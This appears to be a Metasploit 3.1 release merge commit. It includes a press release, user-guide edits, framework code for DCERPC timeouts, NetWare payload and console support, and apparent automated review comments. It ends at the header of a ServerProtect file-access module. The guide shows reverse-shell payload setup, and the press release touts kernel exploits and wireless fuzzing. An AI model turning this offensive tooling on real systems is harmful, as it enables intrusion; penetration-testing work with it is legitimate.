Merged revisions 5366-5377 via svnmerge from

svn+ssh://metasploit.com/home/svn/framework3/branches/framework-3.1

........
  r5366 | hdm | 2008-01-26 20:30:53 -0600 (Sat, 26 Jan 2008) | 2 lines
  
  Update version information
........
  r5367 | hdm | 2008-01-26 21:10:57 -0600 (Sat, 26 Jan 2008) | 3 lines
  
  Updated for version 3.1
........
  r5369 | hdm | 2008-01-26 21:13:31 -0600 (Sat, 26 Jan 2008) | 3 lines
  
  Wipe the private directories from the branch. 
........
  r5371 | hdm | 2008-01-27 17:24:24 -0600 (Sun, 27 Jan 2008) | 5 lines
  
  Timeout options added for dcerpc connect and read times. Addition of novell netware as a supported target platform. Inclusion of the serverprotect exploit (still works on the latest version). Addition of the first remote netware kernel exploit that leads to a shell, addition of netware stager and shell, and first draft of the release notes for 3.1
........
  r5372 | hdm | 2008-01-27 17:30:08 -0600 (Sun, 27 Jan 2008) | 3 lines
  
  Formatting, indentation, fixed the static IP embedded in the request
........
  r5373 | hdm | 2008-01-27 20:02:48 -0600 (Sun, 27 Jan 2008) | 3 lines
  
  Correctly trap exploit errors in a way that works with all of the UIs
........
  r5374 | hdm | 2008-01-27 20:23:25 -0600 (Sun, 27 Jan 2008) | 3 lines
  
  More last-minute bug fixes
........
  r5375 | hdm | 2008-01-27 20:37:43 -0600 (Sun, 27 Jan 2008) | 3 lines
  
  Force multi-bind off in netware, correct label display in gtk gui labels
........
  r5376 | hdm | 2008-01-27 20:50:03 -0600 (Sun, 27 Jan 2008) | 3 lines
  
  More exception handling fun
........


git-svn-id: file:///home/svn/framework3/trunk@5378 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-01-28 03:06:31 +00:00
parent 63971bc6e2
commit 6677beb174
24 changed files with 1664 additions and 478 deletions

View File

@ -0,0 +1,93 @@
888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
Contact: H D Moore FOR IMMEDIATE RELEASE
Email: hdm[at]metasploit.com
METASPLOIT UNLEASHES VERSION 3.1 OF THE METASPLOIT FRAMEWORK
New Version of Attack Framework Ready to Pwn
Austin, Texas, January 28th, 2008 -- The Metasploit Project
announced today the free, world-wide availability of version 3.1 of
their exploit development and attack framework. The latest version
features a graphical user interface, full support for the Windows
platform, and over 450 modules, including 265 remote exploits.
"Metasploit 3.1 consolidates a year of research and development,
integrating ideas and code from some of the sharpest and most innovative
folks in the security research community" said H D Moore, project
manager. Moore is referring the numerous research projects that have
lent code to the framework.
These projects include the METASM pure-ruby assembler developed by
Yoann Guillot and Julien Tinnes, the "Hacking the iPhone" effort
outlined in the Metasploit Blog, the Windows kernel-land payload
staging system developed by Matt Miller, the heapLib browser
exploitation library written by Alexander Sotirov, the Lorcon 802.11
raw transmit library created by Joshua Wright and Mike Kershaw, Scruby,
the Ruby port of Philippe Biondi's Scapy project, developed by Sylvain
Sarmejeanne, and a contextual encoding system for Metasploit payloads.
"Contextual encoding breaks most forms of shellcode analysis by
encoding a payload with a target-specific key" said I)ruid, author of
the Uninformed Journal (volume 9) article and developer of the
contextual encoding system included with Metasploit 3.1.
The graphical user interface is a major step forward for Metasploit
users on the Windows platform. Development of this interface was driven
by Fabrice Mourron and provides a wizard-based exploitation system, a
graphical file and process browser for the Meterpreter payloads, and a
multi-tab console interface. "The Metasploit GUI puts Windows users on
the same footing as those running Unix by giving them access to a
console interface to the framework" said H D Moore, who worked with
Fabrice on the GUI project.
The latest incarnation of the framework includes a bristling
arsenal of exploit modules that are sure to put a smile on the face of
every information warrior. Notable exploits in the 3.1 release include
a remote, unpatched kernel-land exploit for Novell Netware, written by
toto, a series of 802.11 fuzzing modules that can spray the local
airspace with malformed frames, taking out a wide swath of
wireless-enabled devices, and a battery of exploits targeted at
Borland's InterBase product line. "I found so many holes that I just
gave up releasing all of them", said Ramon de Carvalho, founder of RISE
Security, and Metasploit contributor.
The Metasploit Framework is used by network security professionals
to perform penetration tests, system administrators to verify patch
installations, product vendors to perform regression testing, and
security researchers world-wide. The framework is written in the Ruby
programming language and includes components written in C and assembler.
Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used
on a wide range of hardware platforms, from massive Unix mainframes to
the tiny Nokia n800 handheld. Users can access Metasploit using the
tab-completing console interface, the Gtk GUI, the command line scripting
interface, or the AJAX-enabled web interface. The Windows version of
Metasploit includes all software dependencies and a selection of useful
networking tools.
The latest version of the Metasploit Framework, as well as screen
shots, video demonstrations, documentation and installation
instructions for many platforms, can be found online at
http://metasploit3.com/
# # #
If you'd like more information about this topic, or to schedule an
interview with the developers, please email msfdev[at]metasploit.com

Binary file not shown.

View File

@ -23,7 +23,7 @@
\huge{Metasploit Framework User Guide}
\ \\[10mm]
\large{Version 3.0}
\large{Version 3.1}
\\[120mm]
\small{\url{http://www.metasploit.com/}}
@ -41,7 +41,7 @@
\chapter{Introduction}
\par
This is the official user guide for version 3.0 of the Metasploit Framework. This
This is the official user guide for version 3.1 of the Metasploit Framework. This
guide is designed to provide an overview of what the framework is, how it works,
and what you can do with it. The latest version of this document can be found
on the Metasploit Framework web site.
@ -63,7 +63,7 @@ Installing the Framework is as easy as extracting the tarball, changing into the
created directory, and executing your preferred user interface. We strongly
recommend that you use a version of the Ruby interpreter that was built with
support for the GNU Readline library. If you are using the Framework on Mac OS
X, you will need to install GNU Readline and then recompile the Ruby
X prior to 10.5.1, you will need to install GNU Readline and then recompile the Ruby
interpreter. Using a version of Ruby with Readline support enables tab completion
of the console interface. The \texttt{msfconsole} user interface is preferred for everyday
use, but the \texttt{msfweb} interface can be useful for live demonstrations.
@ -81,28 +81,21 @@ distribution.
\label{INSTALL-WIN32}
\par
The Metasploit Framework is only partially supported on the Windows platform. If you would like
to access most of the Framework features from Windows, we recommend using a virtualization environment,
such as VMWare, with a supported Linux distribution
\footnote{We highly recommend the BackTrack live CD, available from \url{http://www.remote-exploit.org/}}. If this is not possible, you can also use the
Framework from within Cygwin. To use the Framework from within Cygwin, follow the instructions for
installation on a Unix system. For more information on Cygwin, please see the Cygwin web site at
\url{http://www.cygwin.com/}
The Metasploit Framework is fully supported on the Windows platform. To install the Framework on Windows,
download the latest version of the Windows installer from \url{http://framework.metasploit.com/}, perform
an online update, and launch the \texttt{msfgui} interface from the Start Menu. To access a standard
\texttt{msfconsole} interface, select the Console option from the Window menu. As an alternative, you can
use the \texttt{msfweb} interface, which supports Mozilla Firefox and Internet Explorer.
To install the Framework on Windows, download the latest version of the Windows installer from
\url{http://framework.metasploit.com/}, perform an online update, and launch the \texttt{msfweb}
interface. Once \texttt{msfweb} is running, access the \url{http://127.0.0.1:55555/} URL from within
your browser. At this time, only Mozilla and Internet Explorer are fully supported.
\section{Platform Caveats}
\label{INSTALL-CAVEAT}
\par
When using the Framework on the Windows platform, keep in mind that \texttt{msfweb} is the only
supported user interface. While \texttt{msfconsole} and \texttt{msfcli} may appear to work, they
are severely limited by the way stdio operations are handled. The result is that all Ruby threads
will block when input is being read from the console. This can prevent most exploits, auxiliary modules,
and plugins from functioning. This problem does not occur within Cygwin.
When using the Framework on the Windows platform, keep in mind that \texttt{msfgui} and \texttt{msfweb} are the only
supported user interfaces. While \texttt{msfcli} may appear to work on the command line, it will will run into
trouble as soon as more than one active thread is present. This can prevent most exploits, auxiliary modules,
and plugins from functioning. This problem does not occur within Cygwin environment.
\section{Supported Operating Systems}
\label{INSTALL-SUPPORT}
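Review bot: two typos in the rewritten Platform Caveats paragraph: "it will will run into trouble" doubles "will", and "within Cygwin environment" needs an article ("within a Cygwin environment"). The same paragraph states that msfgui and msfweb are the only supported interfaces, while the installation paragraph above tells Windows users to reach msfconsole through the Window menu; saying that the console embedded in msfgui is the supported way to get msfconsole on Windows would remove the apparent contradiction.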
@ -114,21 +107,25 @@ version of the Framework is tested with three primary platforms:
\begin{itemize}
\item Linux 2.6 (x86, ppc)
\item Windows NT (2000, XP, 2003)
\item MacOS X 10.4 (x86, ppc)
\item Windows NT (2000, XP, 2003, Vista)
\item MacOS X 10.4 (x86, ppc), 10.5 (x86)
\end{itemize}
\par
For information about manually installing the framework, including all of the required dependencies needed
to use the new \texttt{msfgui} interface, please see the framework web site: \url{http://framework.metasploit.com/msf/support}
\section{Updating the Framework}
\label{INSTALL-UPDATE}
\par
The Framework can be updated using a standard \texttt{Subversion} client. The
old \texttt{msfupdate} tool is no longer supported. To obtain the latest updates,
change into the Framework installation directory and execute \texttt{svn update}. If
you are accessing the internet through a HTTP proxy server, please see the
Subversion FAQ on proxy access: \url{http://subversion.tigris.org/faq.html#proxy}
If your version of Subversion does not support SSL, execute the following command
to switch to non-SSL HTTP:
old \texttt{msfupdate} tool is no longer supported. Windows users can click on
the Online Update link within the Metasploit 3 program folder on the Start Menu.
To obtain the latest updates on a Unix-like platform, change into the Framework
installation directory and execute \texttt{svn update}. If you are accessing the
internet through a HTTP proxy server, please see the Subversion FAQ on proxy
access: \url{http://subversion.tigris.org/faq.html#proxy}
\pagebreak
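Review bot: the deleted sentence "If your version of Subversion does not support SSL, execute the following command to switch to non-SSL HTTP:" introduced a command block, and this hunk ends at \pagebreak without touching anything after it; confirm that the verbatim block the sentence introduced was removed as well, otherwise it now dangles with no lead-in. Minor: "a HTTP proxy server" should read "an HTTP proxy server" (present in both the old and the new text).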
@ -140,8 +137,8 @@ to switch to non-SSL HTTP:
\par
After you have installed the Framework, you should verify that everything is
working properly The easiest way to do this is to execute the
\texttt{msfconsole} user interface. If you are using Windows, start the \texttt{msfweb}
interface and access the \texttt{Console} link from within your browser.
\texttt{msfconsole} user interface. If you are using Windows, start the \texttt{msfgui}
interface and access the \texttt{Console} link from the Window menu.
The console should display an ASCII art logo, print the current version, some module
counts, and drop to a "msf> " prompt. From this prompt, type \texttt{help} to get a list of
valid commands. You are currently in the "main" mode; this allows you to list
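Review bot: the context line "working properly The easiest way to do this" is missing a full stop after "properly"; since the paragraph is being edited here anyway, fix it in the same change.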
@ -166,6 +163,8 @@ The console startup will similar to the text below.
\begin{verbatim}
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
@ -177,14 +176,36 @@ ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ msf v3.0-beta-dev
+ -- --=[ 179 exploits - 104 payloads
+ -- --=[ 18 encoders - 5 nops
=[ 29 aux
=[ msf v3.1-release
+ -- --=[ 263 exploits - 116 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 45 aux
msf >
\end{verbatim}
\section{The GUI Interface}
\label{STARTED-GUI}
\par
The \texttt{msfgui} interface was introduced in version 3.1 and provides the functionality
of \texttt{msfconsole} in addition to many new features. To access a \texttt{msfconsole}
shell, select the Console option from the Window menu. To search for a module within the
module tree, enter a string or regular expression into the search box and click the button
labeled Find. All matching modules will appear the tree below. To execute a module,
double-click its name in the tree, or right-click its name and select the Execute option.
To view the source code of any module, right-click its name and select the View Code option.
\par
Once a module is selected, a wizard-based interface will walk you through the process of
configuring and launching the module. In the case of exploit modules, the output from
the module will appear in the main window under the Module Output tab. Any sessions created
by the module will appear in the Sessions view in the main window. To access a session,
double-click the session name in the view, or open a Console and use the \texttt{sessions}
command to interact with the shell. Metepreter sessions will spawn a shell when double-clicked,
but also offer a process and file browser via the right-click context menu.
\section{The Command Line Interface}
\label{STARTED-CLI}
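Review bot: two typos in the new GUI section: "All matching modules will appear the tree below" is missing "in", and "Metepreter sessions" should be "Meterpreter sessions".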
@ -204,23 +225,15 @@ actions, C to try a vulnerability check, and E to exploit. The saved
datastore will be loaded and used at startup, allowing you to configure
convenient default options in the Global or module-specific datastore of
\texttt{msfconsole}, save them, and take advantage of them in the
\texttt{msfcli} interface.
\texttt{msfcli} interface. As of version 3.1, the \texttt{msfcli} interface
will also work with auxiliary modules.
\section{The Web Interface}
\label{STARTED-WEB}
\par
The \texttt{msfweb} interface is based on Ruby on Rails. To use this interface, you need to have
the \texttt{rubygems} package and the appropriate version of \texttt{rails} gem. Once
\texttt{rubygems} has been installed, you can get the correct version of \texttt{rails}
with the following command.\footnote{The Windows version already includes the \texttt{rubygems}
and the correct version of \texttt{rails}}
\begin{verbatim}
$ gem install -v1.2.2 rails
\end{verbatim}
Once \texttt{rails} is configured, execute \texttt{msfweb} to start up the server. The \texttt{msfweb}
The \texttt{msfweb} interface is based on Ruby on Rails. To access this interface,
execute \texttt{msfweb} to start up the server. The \texttt{msfweb}
interface uses the WEBrick web server to handle requests. By default, \texttt{msfweb} will listen
on the loopback address (127.0.0.1) on port 55555. A log message should be displayed indicating that
the service has started. To access the interface, open your browser to the appropriate URL
@ -512,7 +525,8 @@ Using the options supported by the \texttt{generate} command, different
formats of a payload can be generated. Some payloads will require options
which can be specified through the \texttt{-o} parameter. Additionally, a
format to convey the generated payload can be specified through the
\texttt{-t} parameter.
\texttt{-t} parameter. To save the resulting data to a local file, pass the
\texttt{-f} parameter followed by the output file name.
\begin{verbatim}
msf payload(shell_reverse_tcp) > set LHOST 1.2.3.4
@ -708,7 +722,7 @@ running with System privileges.
\par
If there is no interactive user logged into the system or the screen has been
locked, the command shell can be used to launch explorer.exe anyways. This can
result in some very confused users when the logon screen also has a start menu.
result in some very confused users when the logon screen also has a Start Menu.
If the interactive desktop is changed, either through someone logging into the
system or locking the screen, the VNC server will disconnect the client. Future
versions may attempt to follow a desktop switch.
@ -796,7 +810,7 @@ use a terminal emulator which limits the functionality available through
hostile escape sequences. Please see the Terminal Emulator Security Issues paper
below for more information on this topic:
\url{http://www.digitaldefense.net/labs/papers/Termulation.txt}
\url{http://marc.info/?l=bugtraq&m=104612710031920&q=p3}
\section{Web Interface}

View File

@ -56,6 +56,9 @@ module Exploit
#
def self.exploit_simple(exploit, opts)
# Trap and print errors here (makes them UI-independent)
begin
# Import options from the OptionStr or Option hash.
exploit._import_extra_options(opts)
@ -121,6 +124,15 @@ module Exploit
exploit.job_id = driver.job_id
return session
rescue ::Interrupt
raise $!
rescue ::Exception => e
exploit.print_error("Exploit failed: #{e}")
elog("Exploit failed: #{e}", 'core', LEV_0)
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
return
end
end
#
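Review bot: `rescue ::Exception => e` after re-raising `::Interrupt` still swallows SystemExit, NoMemoryError and any SignalException other than Interrupt, so an `exit` or a SIGTERM arriving during an exploit run is logged as "Exploit failed" and ignored; either narrow the arm to `rescue ::StandardError, ::ScriptError => e` or re-raise those classes alongside Interrupt. The bare `return` yields nil, which is also what a successful run returns when no session is created, so document that callers cannot use a nil result to tell failure from "no session".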

View File

@ -49,8 +49,13 @@ module Exploit::Remote::DCERPC
[
Opt::RHOST,
Opt::RPORT(135),
], Msf::Exploit::Remote::DCERPC
)
], Msf::Exploit::Remote::DCERPC)
register_advanced_options(
[
OptInt.new('DCERPC::ReadTimeout', [ true, 'The number of seconds to wait for DCERPC responses', 0] )
], Msf::Exploit::Remote::DCERPC)
end
def dcerpc_handle(uuid, version, protocol, opts)
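Review bot: `DCERPC::ReadTimeout` is registered as required with a default of 0; in Ruby 0 is truthy, so the `datastore['DCERPC::ReadTimeout'] || 10` fallback in dcerpc_handle (next hunk) never takes effect and a fresh datastore yields read_timeout = 0. Register the default as 10, matching the Rex client's own 'read_timeout' default in this commit, or make the option optional so nil falls through to the fallback.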
@ -92,6 +97,10 @@ module Exploit::Remote::DCERPC
opts['smb_client'] = self.simple
end
opts['connect_timeout'] = (datastore['ConnectTimeout'] || 10).to_i
opts['read_timeout'] = (datastore['DCERPC::ReadTimeout'] || 10).to_i
self.dcerpc = Rex::Proto::DCERPC::Client.new(h, self.sock, opts)
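Review bot: `datastore['ConnectTimeout']` is read here but no such option is registered in this mixin; it presumably comes from the TCP mixin the exploit also includes, so either add a comment saying so or register it here with the same default, otherwise a module that only includes the DCERPC mixin silently always uses 10. Note also that the `|| 10` fallbacks are dead code for any option that is registered with a default (see the 0 default in the previous hunk).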
@ -100,16 +109,17 @@ module Exploit::Remote::DCERPC
end
end
def dcerpc_call(function, stub = '')
def dcerpc_call(function, stub = '', timeout=nil)
otimeout = dcerpc.options['read_timeout']
begin
dcerpc.options['read_timeout'] = timeout if timeout
dcerpc.call(function, stub)
rescue ::Rex::Proto::SMB::Exceptions::NoReply, Rex::Proto::DCERPC::Exceptions::NoResponse
print_status("The DCERPC service did not reply to our request")
return
rescue ::Exception
raise $!
# print_status("DCERPC Error: #{$!.class.to_s} - #{$!.backtrace.join(" - ")}")
# return
ensure
dcerpc.options['read_timeout'] = otimeout
end
end
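Review bot: the `rescue ::Exception` / `raise $!` arm is a no-op (without it the exception propagates the same way and the ensure still runs) and it carries two commented-out lines; delete the arm and the dead comments. Restoring read_timeout in ensure is the right approach. One more detail: the NoReply/NoResponse arm returns nil after a print_status, so callers cannot tell a timeout from a call that legitimately returned nothing; returning nil is acceptable, but the message belongs in print_error, since from the caller's point of view it is an error.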

View File

@ -111,6 +111,10 @@ class ExploitDriver
# - Cleans up the handler
#
def run
# Set up the run context
ctx = [ exploit, payload ]
# First thing's first -- validate the state. Make sure all requirement
# parameters are set, including those that are derived from the
# datastore.
@ -127,10 +131,6 @@ class ExploitDriver
# Default the session to nil
self.session = nil
# Set up the run context
ctx = [ exploit, payload ]
# If we are being instructed to run as a job then let's create that job
# like a good person.
if (use_job)
@ -198,7 +198,7 @@ protected
payload.stop_handler
exploit.cleanup
raise $!
return
end
end
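Review bot: replacing `raise $!` with `return` after payload.stop_handler / exploit.cleanup drops the exception that reached this rescue. For the foreground path that is fine now that exploit_simple logs failures, but this protected block also serves the job path (see `use_job` above), where exploit_simple's rescue does not see the worker thread's exception; confirm the job wrapper logs the error before this `return`, otherwise failures of jobified exploits become silent.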

View File

@ -15,7 +15,7 @@ class Framework
#
Major = 3
Minor = 2
Release = "-dev"
Release = "-release"
Version = "#{Major}.#{Minor}#{Release}"
Revision = "$Revision$"
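Review bot: Minor is 2 in this file (unchanged context line), so merging `Release = "-release"` into trunk makes it report "msf v3.2-release", while the release being cut is 3.1 (user guide banner and press release in this same commit). On trunk Release should stay "-dev"; only the 3.1 branch should carry "-release".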

View File

@ -288,6 +288,14 @@ class Msf::Module::Platform
end
end
#
# NetWare
#
class Netware < Msf::Module::Platform
Rank = 100
Alias = "netware"
end
#
# Linux
#

View File

@ -899,7 +899,7 @@ protected
# Load the file like it aint no thang
begin
if (!load(file))
elog("Failed to load from file #{file}.")
elog("Failed to load module from #{file}")
return false
end
rescue NameError
@ -917,6 +917,10 @@ protected
rescue LoadError
elog("LoadError: #{$!}.")
return false
rescue ::Exception => e
elog("Failed to load module from #{file}: #{e.class} #{e}")
self.module_failed[file] = e
return false
end
added = mod.constants - old_constants
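Review bot: `rescue ::Exception => e` at the end of the load chain also catches Interrupt and SystemExit, so a Ctrl-C during a module reload is recorded in module_failed as a failed module instead of stopping the reload; narrow it to `rescue ::StandardError, ::ScriptError => e` (the NameError and LoadError arms above already fall under those). Storing the exception object in module_failed[file] keeps its full backtrace alive for the life of the framework; `e.class` and `e.message` would be enough for the UI.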

View File

@ -24,6 +24,7 @@ class Payload < Msf::Module
require 'msf/core/payload/osx'
require 'msf/core/payload/solaris'
require 'msf/core/payload/windows'
require 'msf/core/payload/netware'
##
#

View File

@ -227,11 +227,10 @@ protected
session,
payload_type)
dlog("Selected payload #{actual_payload.refname} from generic payload #{refname}", 'core', LEV_2)
if actual_payload.nil?
raise NoCompatiblePayloadError, "Could not locate a compatible payload for #{actual_platform}/#{actual_arch}"
raise NoCompatiblePayloadError, "Could not locate a compatible payload for #{actual_platform.names.join("/")}/#{actual_arch}"
else
dlog("Selected payload #{actual_payload.refname} from generic payload #{refname}", 'core', LEV_2)
# Share our datastore with the actual payload so that it has the
# appropriate values to substitute ad so on.
self.actual_payload.share_datastore(self.datastore)
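Review bot: moving the dlog below the nil check is correct, since the old order dereferenced actual_payload.refname before checking for nil; while this block is being touched, the context comment "substitute ad so on" should read "and so on".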

View File

@ -0,0 +1,33 @@
require 'msf/core'
###
#
# This class is here to implement advanced features for netware-based
# payloads. NetWare payloads are expected to include this module if
# they want to support these features.
#
###
module Msf::Payload::Netware
def initialize(info = {})
ret = super(info)
end
#
# Returns a list of compatible encoders based on architecture
# fnstenv does not work on NetWare
#
def compatible_encoders
encoders = super()
encoders2 = []
encoders.each { |encname, encmod|
if (!encname.include?('fnstenv_mov') && !encname.include?('shikata_ga_nai'))
encoders2 << [ encname, encmod ]
end
}
return encoders2;
end
end
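Review bot: the `initialize` override only calls super and assigns the result to an unused `ret`; remove it. In compatible_encoders, `return encoders2;` has a stray semicolon, and the filter reads more clearly as `encoders.reject { |encname, encmod| encname.include?('fnstenv_mov') or encname.include?('shikata_ga_nai') }`. The comment explains fnstenv but not why shikata_ga_nai is excluded (it also derives its position from fnstenv); say so, since any future encoder using the same technique would otherwise have to be added here by name.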

View File

@ -0,0 +1,103 @@
require 'msf/base'
module Msf
module Sessions
###
#
# This class provides basic interaction with a command shell on the remote
# endpoint. This session is initialized with a stream that will be used
# as the pipe for reading and writing the command shell.
#
###
class NetwareConsole
#
# This interface supports basic interaction.
#
include Msf::Session::Basic
#
# This interface supports interacting with a single command shell.
#
include Msf::Session::Provider::SingleCommandShell
#
# Returns the type of session.
#
def self.type
"shell"
end
#
# Returns the session description.
#
def desc
"NetWare Console"
end
#
# Calls the class method.
#
def type
self.class.type
end
#
# The shell will have been initialized by default.
#
def init_shell
return true
end
#
# Read from the command shell.
#
def read_shell(length = nil)
return rstream.read(length)
end
#
# Writes to the command shell.
#
def write_shell(buf)
rstream.write(buf)
end
#
# Closes the shell.
#
def close_shell()
rstream.close
end
def _stream_read_remote_write_local(stream)
buf = stream.get
bsize = 25 * 80 +8
while buf.length > 0
data = buf[0, bsize]
user_output.print("\e[24A")
for i in 0..24
user_output.print(data[8+i*80, 80] + "\n")
end
col = data[4, 2].unpack('v')[0]
line = 25-data[6, 2].unpack('v')[0]
user_output.print("\e[#{line}A")
user_output.print("\e[#{col}C")
if (buf.length == bsize)
buf = ''
else
buf = buf[bsize, buf.length]
end
end
end
end
end
end
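Review bot: _stream_read_remote_write_local assumes every read is an exact multiple of bsize (25 * 80 + 8 = 2008 bytes). On a short read, `data[8+i*80, 80]` returns nil for rows past the end of the data and the `+ "\n"` raises NoMethodError; and when buf.length < bsize the else branch sets `buf = buf[bsize, buf.length]`, which is nil, so the next `buf.length` raises as well. Keep the incomplete tail in an instance variable, prepend it to the next stream.get, and only render full 2008-byte frames. Minor: the `25 * 80 +8` spacing, and the `data[4, 2]` / `data[6, 2]` reads deserve a comment naming the header fields they decode (cursor column and row, by their use), since the frame layout is otherwise undocumented.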

View File

@ -124,8 +124,12 @@ class Exploit
'LocalInput' => driver.input,
'LocalOutput' => driver.output,
'RunAsJob' => jobify)
rescue
return false
rescue ::Interrupt
raise $!
rescue ::Exception => e
# All exceptions should be handled below this layer
nil
end
# If we were given a session, let's see what we can do with it
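Review bot: `e` is bound in `rescue ::Exception => e` but never used; drop the binding. Removing `return false` changes behaviour: after a failed call execution now continues into the session check below, so `session` must be nil on that path; if it is simply the result of the exploit_simple call (which now returns nil on failure) that holds, but if the local is assigned earlier it could carry a stale value into the check.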

View File

@ -525,7 +525,9 @@ module Msf
begin
@mydriver.run
rescue ::Exception => e
nil
@mydriver.exploit.print_error("Exploit failed: #{$!}")
elog("Exploit failed: #{$!}", 'core', LEV_0)
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
end
select(nil, nil, nil, 0.01)
@pipe.print_status("Exploit #{@mydriver.exploit.refname} completed.") if not @mydriver.use_job
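Review bot: the new rescue arm binds `e` but then reads `$!` and `$@`; use `e` and `e.backtrace`, as the equivalent code in exploit_simple in this commit does, since `$!` is reset if anything inside the arm raises and rescues internally. Also, the "Exploit ... completed." status line that follows is printed even after the failure branch; print it only on success, or emit a failure message from the rescue arm instead.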

View File

@ -29,7 +29,7 @@ module Msf
hbox = Gtk::HBox.new(false, 0)
self.pack_start(hbox, false, false, 0)
@checkbutton = Gtk::CheckButton.new(self.key)
@checkbutton = Gtk::CheckButton.new(self.key.gsub("_", "__"))
hbox.pack_start(@checkbutton, true, true, 0)
# Define the CheckButton state

View File

@ -18,7 +18,10 @@ require 'rex/proto/smb/exceptions'
self.options = {
'smb_user' => '',
'smb_pass' => '',
'smb_pipeio' => 'rw'
'smb_pipeio' => 'rw',
'smb_name' => nil,
'read_timeout' => 10,
'connect_timeout' => 5
}
self.options.merge!(useroptions)
@ -63,11 +66,7 @@ require 'rex/proto/smb/exceptions'
else
raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
end
# don't support ncacn_ip_udp yet
## when 'ncacn_ip_udp'
## if self.socket.type? != 'udp'
## raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
## end
# No support ncacn_ip_udp (is it needed now that its ripped from Vista?)
else
raise "Unsupported protocol : #{self.handle.protocol}"
end
@ -75,20 +74,34 @@ require 'rex/proto/smb/exceptions'
# Create the appropriate socket based on protocol
def socket_setup()
ctx = { 'Msf' => options['Msf'], 'MsfExploit' => options['MsfExploit'] }
ctx = { 'Msf' => self.options['Msf'], 'MsfExploit' => self.options['MsfExploit'] }
self.socket = case self.handle.protocol
when 'ncacn_ip_tcp' then Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => self.handle.options[0], 'Context' => ctx)
when 'ncacn_np' then begin
socket = ''
when 'ncacn_ip_tcp'
Rex::Socket.create_tcp(
'PeerHost' => self.handle.address,
'PeerPort' => self.handle.options[0],
'Context' => ctx,
'Timeout' => self.options['connect_timeout']
)
when 'ncacn_np'
begin
timeout(10) {
socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 445, 'Context' => ctx)
}
socket = Rex::Socket.create_tcp(
'PeerHost' => self.handle.address,
'PeerPort' => 445,
'Context' => ctx,
'Timeout' => self.options['connect_timeout']
)
rescue Timeout::Error, Rex::ConnectionRefused
socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 139, 'Context' => ctx)
socket = Rex::Socket.create_tcp(
'PeerHost' => self.handle.address,
'PeerPort' => 139,
'Context' => ctx,
'Timeout' => self.options['connect_timeout']
)
end
socket
end
else nil
end
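Review bot: the old code wrapped the port-445 connect in `timeout(10) { }`, which is what produced the `Timeout::Error` the rescue arm catches. With the wrapper gone, the fallback to port 139 on a slow host only still works if Rex::Socket.create_tcp propagates `Timeout::Error` when its 'Timeout' option expires; if it raises its own connection-error class instead, only Rex::ConnectionRefused will trigger the fallback. Check what the socket layer raises on expiry and rescue that class here.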
@ -107,8 +120,9 @@ require 'rex/proto/smb/exceptions'
end
smb.login('*SMBSERVER', self.options['smb_user'], self.options['smb_pass'])
smb.connect('IPC$')
smb.connect("\\\\#{self.handle.address}\\IPC$")
self.smb = smb
self.smb.read_timeout = self.options['read_timeout']
end
f = self.smb.create_pipe(self.handle.options[0])
@ -141,13 +155,13 @@ require 'rex/proto/smb/exceptions'
if self.socket.type? == 'tcp'
if self.options['segment_read']
while (true)
data = self.socket.get_once(rand(5)+5, 10)
data = self.socket.get_once(rand(5)+5, self.options['read_timeout'])
break if data == nil
break if ! data.length
raw_response << data
end
else
raw_response = self.socket.get_once(-1, 5)
raw_response = self.socket.get_once(-1, self.options['read_timeout'])
end
else
raw_response = self.socket.read(0xFFFFFFFF / 2 - 1) # read max data
@ -252,7 +266,7 @@ require 'rex/proto/smb/exceptions'
end
# Process a DCERPC response packet from a socket
def self.read_response (socket, timeout=5)
def self.read_response(socket, timeout=self.options['read_timeout'])
data = socket.get_once(-1, timeout)
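Review bot: `self.read_response` is a class method, so `self.options['read_timeout']` in the default argument resolves `options` against the class rather than an instance and raises NoMethodError as soon as a caller omits the timeout. Either keep a literal default (10, matching the new 'read_timeout' default above) or make this an instance method; the same check applies to any other `self.` helper in this file that now references options.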
@ -279,7 +293,8 @@ require 'rex/proto/smb/exceptions'
# Still missing some data...
if (data.length() != resp.frag_len - 10)
$stderr.puts "Truncated DCERPC response :-("
# TODO: Bubble this up somehow
# $stderr.puts "Truncated DCERPC response :-("
return resp
end
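Review bot: commenting out the $stderr line and returning the truncated `resp` means callers now parse a short stub silently. Until the TODO is addressed, at least record the event with dlog (as the core code in this commit does), including resp.frag_len and data.length, so a timeout that cut the read short is visible in the framework log.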

View File

@ -0,0 +1,413 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Auxiliary::Admin::Serverprotect::FileAccess < Msf::Auxiliary
include Exploit::Remote::DCERPC
include Rex::Platforms::Windows
def initialize(info = {})
super(update_info(info,
'Name' => 'TrendMicro ServerProtect File Access',
'Description' => %q{
This modules exploits a remote file access flaw in the ServerProtect Windows
Server RPC service. Please see the action list (or the help output) for more
information.
},
'DefaultOptions' =>
{
'DCERPC::ReadTimeout' => 300 # Long-running RPC calls
},
'Author' => [ 'toto' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-6507' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-07-077.html'],
],
'Actions' =>
[
[ 'delete' ],
[ 'download' ],
